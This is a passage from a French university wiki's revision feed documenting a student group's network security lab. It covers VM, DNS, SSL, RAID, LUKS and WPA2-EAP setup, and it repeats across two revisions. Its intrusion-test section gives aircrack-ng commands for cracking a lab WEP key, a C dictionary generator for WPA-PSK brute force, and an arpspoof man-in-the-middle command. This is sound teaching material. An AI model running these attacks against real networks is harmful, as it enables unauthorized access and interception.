Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group14 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.0 10.60.114.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.100 10.60.114.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.0 10.60.114.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.200 10.60.114.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54775</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54775"/>
				<updated>2020-12-16T13:24:04Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Installation freeRadius */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
